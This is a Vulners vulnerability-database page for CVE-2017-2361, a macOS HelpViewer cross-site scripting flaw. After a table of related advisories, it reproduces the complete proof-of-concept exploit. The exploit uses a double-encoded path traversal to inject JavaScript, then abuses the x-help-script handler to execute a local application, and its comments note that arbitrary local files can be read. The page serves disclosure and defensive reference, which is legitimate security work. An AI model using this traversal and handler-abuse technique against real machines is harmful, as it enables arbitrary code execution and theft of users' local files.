Vulners
Lucene search
macOS HelpViewer XSS leads to arbitrary file execution and arbitrary file readļ¼CVE-2017-2361ļ¼
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Exploit | 24 Feb 201700:00 | ā | zdt |
 | Mac OS X 10.x < 10.12.3 Multiple Vulnerabilities | 1 Feb 201700:00 | ā | nessus |
| macOS 10.12.x < 10.12.3 Multiple Vulnerabilities | 24 Jan 201700:00 | ā | nessus |
 | About the security content of macOS Sierra 10.12.3 | 23 Jan 201700:00 | ā | apple |
| About the security content of macOS Sierra 10.12.3 - Apple Support | 28 Mar 201711:17 | ā | apple |
 | CVE-2017-2361 | 23 Feb 201700:00 | ā | circl |
 | Apple macOS Sierra Help Viewer Cross-Site Scripting Vulnerability | 16 Feb 201700:00 | ā | cnvd |
 | CVE-2017-2361 | 20 Feb 201708:35 | ā | cve |
 | CVE-2017-2361 | 20 Feb 201708:35 | ā | cvelist |
 | EUVD-2017-11544 | 7 Oct 202500:30 | ā | euvd |
10
<script>
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
*/
function main() {
function second() {
var f = document.createElement("iframe");
f.onload = () => {
f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
};
f.src = "help:openbook=com.apple.safari.help";
document.documentElement.appendChild(f);
}
var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
main();
</script>
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Feb 2017 00:00Current
6.9Medium risk
Vulners AI Score6.9
EPSS0.06176